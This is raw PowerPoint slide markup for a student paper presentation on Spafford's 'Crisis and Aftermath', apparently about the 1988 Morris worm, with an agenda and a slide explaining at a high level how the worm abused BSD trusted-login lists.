              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rechteck 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="3262820"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rechteck 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="3201711"/>
            <a:ext cx="7920992" cy="736490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="9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endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rechteck 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1665142" y="4190425"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rechteck 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="4130928"/>
            <a:ext cx="7920992" cy="735006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="9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endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rechteck 12"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="5121510"/>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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rechteck 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="5066557"/>
            <a:ext cx="7920992" cy="736490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="9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endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16"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Paper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Presentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4128386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6" name="Foliennummernplatzhalter 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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Paper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Presentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4144467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Foliennummernplatzhalter 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9"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Paper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Presentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381679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en-US"/>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9" name="Foliennummernplatzhalter 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Fußzeilenplatzhalter 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="1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Paper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Presentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404790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5" name="Foliennummernplatzhalter 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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Paper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Presentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2293752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0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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Paper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Presentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156087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269421" y="78043"/>
            <a:ext cx="11585122" cy="849078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Titelmasterformat durch Klicken bearbeiten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Textplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1687493"/>
            <a:ext cx="11585122" cy="4489470"/>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Paper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Presentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Gerader Verbinder 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="972365"/>
            <a:ext cx="7883979" cy="12506"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="003366"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Gerader Verbinder 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="6268065"/>
            <a:ext cx="11585122" cy="7607"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="003366"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Grafik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00594" y="6303075"/>
            <a:ext cx="2284703" cy="523752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Gerader Verbinder 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="1053043"/>
            <a:ext cx="7577818" cy="18601"/>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Rechteck 18"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11045970" y="6392089"/>
            <a:ext cx="339634" cy="322217"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="172949"/>
          </a:solidFill>
          <a:ln>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800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rechteck 19"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10889995" y="6509653"/>
            <a:ext cx="98364" cy="10075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p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10699184" y="6509653"/>
            <a:ext cx="98364" cy="10075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10043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 id="2147483675" r:id="rId4"/>
    <p:sldLayoutId id="2147483651" r:id="rId5"/>
    <p:sldLayoutId id="2147483652" r:id="rId6"/>
    <p:sldLayoutId id="2147483653" r:id="rId7"/>
    <p:sldLayoutId id="2147483654" r:id="rId8"/>
    <p:sldLayoutId id="2147483655" r:id="rId9"/>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1090760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www.cisco.com/c/en/us/about/security-center/virus-differences.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businessinsider.com/why-robert-morris-didnt-go-to-jail-2013-1"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de-DE" dirty="0" err="1"/>
              <a:t>Crisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Aftermath</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" i="1" dirty="0"/>
              <a:t>Eugene H. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" i="1" dirty="0" err="1"/>
              <a:t>Spafford</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textplatzhalter 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Timo Strauch &amp; Sebastian Poth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3348415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Flaws of the Systems: Trusted Logins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BSD UNIX-Based networking code is the ability to execute tasks on remote machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List of host/login that are assumed to be “trusted”, in the sense that a remote access never asked for a password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Worm examined files that listed machine/logins used by the host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often, machines and accounts are reconfigured reciprocal trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Grafik 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2957541" y="4250724"/>
            <a:ext cx="5195859" cy="1724003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Pfeil: nach rechts 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4806778" y="4485503"/>
            <a:ext cx="1742303" cy="358346"/>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feil: nach rechts 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4806778" y="4893992"/>
            <a:ext cx="1742303" cy="358346"/>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lipse 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4578177" y="4164225"/>
            <a:ext cx="2199502" cy="1458098"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00336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feld 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8153400" y="4399457"/>
            <a:ext cx="2003855" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" u="sng" dirty="0"/>
              <a:t>Trusted machines:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Server/User1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Textfeld 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3202456" y="4548427"/>
            <a:ext cx="815547" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Textfeld 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7057766" y="4533097"/>
            <a:ext cx="815547" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Textfeld 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1406087" y="4411814"/>
            <a:ext cx="2198738" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" u="sng" dirty="0"/>
              <a:t>Remote machines:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Victim/User1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58281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Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Foliennummernplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Fußzeilenplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Paper Presentation – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rechteck 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="1404130"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rechteck 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="1350818"/>
            <a:ext cx="7920992" cy="736490"/>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521437">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History</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rechteck 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="2317984"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="2256875"/>
            <a:ext cx="7920992" cy="1322172"/>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521437">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Foundations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864337" lvl="1" indent="-342900" defTabSz="521437">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Worm vs. Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864337" lvl="1" indent="-342900" defTabSz="521437">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
